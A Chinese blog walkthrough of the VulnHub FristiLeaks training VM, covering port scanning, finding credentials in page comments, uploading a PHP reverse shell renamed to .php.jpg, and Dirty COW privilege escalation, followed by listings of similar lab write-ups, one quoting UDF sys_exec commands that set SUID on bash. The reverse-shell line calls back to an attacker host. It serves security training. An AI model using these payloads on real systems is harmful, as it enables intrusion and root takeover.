Vulnhub-FristiLeaks打靶

最新推荐文章于 2025-12-29 11:45:50 发布
原创 最新推荐文章于 2025-12-29 11:45:50 发布 · 754 阅读 · 18 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #web安全 #笔记 #apache #linux

目录

一、nmap扫描/gobuster目录爆破

二、通过apache解析漏洞上传php反弹shell获得shell

三、脏牛提权

一、nmap扫描/gobuster目录爆破

nmap -sT --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描tcp开放了那些端口,保存到nmap/port中

nmap -sU --min-rate 10000 192.168.213.138 -oA nmapscan/port

扫描udp开放了那些端口,保存到nmap/udp中

nmap -sT -sC -Pn -v -sV -O 192.168.213.138 -oA nmapscan/detail

对开放的端口进行详细的探测,保存到detail中

nmap --script=vuln 192.168.213.138 nmapscan/vuln 

使用nmap的漏洞扫描脚本进行漏洞扫描

通过nmap扫描只知道开放了80端口,nmap枚举出的目录 /cola  /sisi   /beer 都是这个

进行目录爆破

使用gobuster进行常规的目录爆破,没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

使用gobuster对php,sql,txt,zip,rar文件进行爆破,也没有结果

gobuster dir -u http://192.168.213.138 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sql,txt,zip,rar,tar

发现靶机名称为fristi leaks    leaks翻译是泄露的意思,把fristi当作目录名试试

看到这种登录框先考虑有没有sql万能密码,弱密码,尝试过后发现并没有

F12发现两段注释

第一段知道了一个用户名:eezeepz

第二段看到最后的两个“==”,应该是base64,进行解码

发现是png图片

看到了图片的内容,因为只有80端口开放,有一个登录界面,知道了一个用户名,猜测这个可能为密码

eezeepz:keKkeKKeKKeKkEkkEk

登陆成功

二、通过apache解析漏洞上传php反弹shell获得shell

是一个上传的功能点

先写一个php的反弹shell

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.213.128/443 0>&1'");?>

进行上传,只允许这几种图片格式

使用wappalyzer发现apache版本低,可能存在解析漏洞

把shella.php改名为shella.php.jpg

成功上传,nc开启监听,访问:http://192.168.213.138/fristi/uploads/shella.php.jpg

反弹shell成功

三、脏牛提权

uname -a     发现靶机内核为2.6.32

gcc也是有的,可以用脏牛进行提权

把exp下载到靶机

python -m http.server 7777

wget http://192.168.213.128:7777/40839.c

gcc进行编译

gcc -pthread -o exp 40839.c -lcrypt

su firefart

总结:通过靶机名发现fristi目录,f12发现注释,进行base64解码后知道了密码,登录后使用apache解析漏洞成功获取到shell,最后使用脏牛进行提权。

*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
Zeu_s的博客
03-06 725
*VulnHub-FristiLeaks:1.3暴力解法、细节解法,主打软硬都吃,隧道搭建、寻找exp、提权、只要你想没有做不到的姿势
vulnhub系列:Fristileaks 1.3
jq_j37的博客
07-31 618
vulnhub系列:Fristileaks 1.3靶机,打靶文章
vulnhubFristiLeaks_1.3靶机
weixin_62162207的博客
08-01 475
FristiLeaks_1.3靶机:打靶训练
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)
网安学习
08-01 1164
FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)-脏牛提权、SUDO提权
FristiLeaks靶机
m0_61995767的博客
07-30 783
FristiLeaks打靶记录
FristiLeaks靶场打靶记录
qq_64703089的博客
09-29 1064
FristiLeaks靶场
vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。
Zeu_s的博客
03-07 1337
vulnhub靶场渗透之Stapler 8000字详解,多种方式任你挑选,sql注入、隧道建立、hadry爆破、内核漏洞利用。
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 872
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
Vulnhub-Kioptrix Level 4 打靶
a2FpX2tr的博客
12-10 886
UDF提权不止有创建新用户并赋予root权限,下面还有几种方法供大家选择: 1. 设置 SUID 位 通过设置 SUID 位,允许普通用户以 root 权限运行某些程序, 例如 /bin/bash: SELECT sys_exec('chmod u+s /bin/bash'); 2.将用户 john 添加到 sudo 组 SELECT sys_exec('/usr/sbin/usermod -aG sudo john'); 3.修改系统登录文件(如 /etc/passwd)将 root 用户的密码直接移除
VulnHub靶机 DC-5 打靶 渗透测试详细过程
网络空间安全学习
04-18 1676
在访问/footer.php,/thankyou.php时发现跳转界面和原始界面的年份不一样,总是来回变动,刷新也会变动。目录爆破发现,存在file参数,尝试读取一下/etc/passwd文件,成功读取/etc/passwd文件并回显成功。当然既然知道了包含/footer.php文件,那么我们也可以去猜解参数,常用的如file,尝试一下即可,或者爆破。暴露出如下几个目录,去访问发现其中的目录,爆出的目录其中有一些界面为默认界面当中点击跳转的目录。给予sh文件执行权限,直接执行一下试试,成功提权。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 4662
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8856
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Web安全之SQL注入-CSRF-XSS
AI大模型/Python/Java/MySQL技术栈,快来和我一起学习吧 ~
12-29 658
攻击者通过在用户输入中嵌入恶意 SQL 片段,绕过应用逻辑,直接操作数据库。 示例(危险代码): → 可导致:数据泄露、删除表、提权、远程命令执行(如 PostgreSQL 的 COPY TO)攻击者诱导已登录用户访问恶意网站,该网站自动向目标站点(如银行)发起带 Cookie 的请求(如转账),利用用户身份执行非意愿操作。 前提:用户已登录目标站 + 请求无二次验证。攻击者将恶意脚本(JavaScript)注入网页,当其他用户浏览时执行,窃取 Cookie、会话、钓鱼等。 分类:示例:
【小迪安全web安全|渗透测试|网络安全|SRC挖掘|学习笔记|2021|
weixin_45635831的博客
12-25 622
批量挖掘流程:FOFA收集目标(50万+域名)xray批量扫描(万分之一命中率)人工验证漏洞真实性提交漏洞平台源码审计优势:能深度分析算法逻辑和安全机制黑盒测试要点:常规漏洞扫描JS接口探测三方组件分析经济因素考量:部分售卖系统可能需要购买授权才能获取测试权限开发语言特征:JAVA开发系统常将核心部分封装到dll或jar文件中反编译工具:使用dnSpy等工具对编译文件进行反编译分析。
计算机网络 (郑烇) 8 网络安全
qq_44845100的博客
12-28 111
AI正在重塑网络安全:自动化渗透测试如何让企业“先攻后防”?
2501_93360277的博客
12-25 1125
而AI智能自动化渗透测试系统,融合前沿人工智能技术与多年实战攻防经验,将复杂的黑客攻击路径高度标准化、流程化,实现从资产发现、漏洞探测、利用验证,到报告生成、溯源分析的。系统内置针对WebLogic、OA系统、物联网、工控设备等高危场景的专项插件,支持“目标盲打”和自定义参数配置,跳过冗余步骤,直击漏洞核心。选择一套专业的AI渗透测试系统,就是为您的数字业务装上“智能雷达”与“自动盾牌”,在攻防对抗中牢牢掌握主动权,筑牢高质量发展的安全基石。全面、准确的资产画像,是构建有效防御体系的第一步。
第2天:基础入门-Web应用&架构搭建&漏洞&HTTP数据包&代理服务器|小迪安全笔记|网络安全|
weixin_45635831的博客
12-28 742
26:07。
7. 网络安全-等保
最新发布
princemilo的博客
12-29 553
国家要求信息系统(网站、APP、云平台等)进行分等级的保护。
万字详解Lampiao靶机渗透全流程:Drupalgeddon2漏洞+CVE-2016-5195脏牛漏洞复现
mooyuan的网络安全博客
12-26 1132
本文详细记录了通过脏牛漏洞(CVE-2016-5195)对Lampiao靶机进行渗透测试的全过程。首先使用nmap扫描发现靶机运行Drupal服务,利用Drupalgeddon2漏洞获取初始访问权限;随后上传漏洞检测脚本,确认存在脏牛漏洞;最后通过编译执行脏牛漏洞利用程序,成功将权限从www-data提升至root。实验环境包括Kali攻击机(192.168.59.141)和Lampiao靶机(192.168.59.150),完整演示了从信息收集、漏洞利用到权限提升的渗透测试流程。
vulnhub打靶
03-17
### 关于 VulnHub安全测试与漏洞练习资源 VulnHub 是一个提供虚拟机镜像下载的平台,这些镜像是为了帮助网络安全爱好者学习渗透测试技术而设计的。通过模拟真实的网络环境和已知的安全漏洞,用户可以在合法授权的情况下进行实践操作。 #### 下载挑战解决方案 VulnHub 提供了一系列基于目标的操作系统或应用程序的虚拟机镜像文件。以下是关于如何获取并解决这些挑战的一些指导: 1. **访问官方网站**: 用户可以前往 VulnHub 官方网站 (https://www.vulnhub.com/) 浏览可用的虚拟机镜像列表[^1]。 2. **选择合适的机器**: 每台机器都有其特定的目标和技术难度等级描述。初学者可以选择标注为入门级的机器来熟悉基本流程[^2]。 3. **下载所需工具**: 大多数情况下, 需要使用 VirtualBox 或 VMware 这样的虚拟化软件运行所下载的 `.ova` 文件[^3]。 4. **配置网络设置**: 正确设置主机与客户操作系统之间的网络连接方式非常重要。通常推荐桥接模式以便让虚拟机能被同一局域网内的其他设备发现[^4]。 5. **执行扫描与分析**: 使用 Nmap 等端口扫描工具识别开放服务及其版本号;接着利用 Metasploit Framework 或 Exploit Database 寻找可能存在的漏洞加以验证[^5]: ```bash nmap -A <target_ip> ``` 6. **尝试提权与控制**: 成功找到入口点之后,还需要进一步探索是否存在本地权限提升的机会,最终实现完全控制系统的目的[^6]。 7. **撰写报告总结经验教训**: 将整个过程记录下来形成文档不仅有助于自我反思也方便分享给他人参考学习[^7]。 请注意,在任何实际环境中实施上述活动之前都应获得适当许可以免触犯法律!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值